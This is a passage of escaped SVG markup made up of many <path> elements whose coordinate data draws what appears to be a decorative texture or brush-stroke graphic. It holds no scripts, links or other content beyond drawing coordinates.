d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path 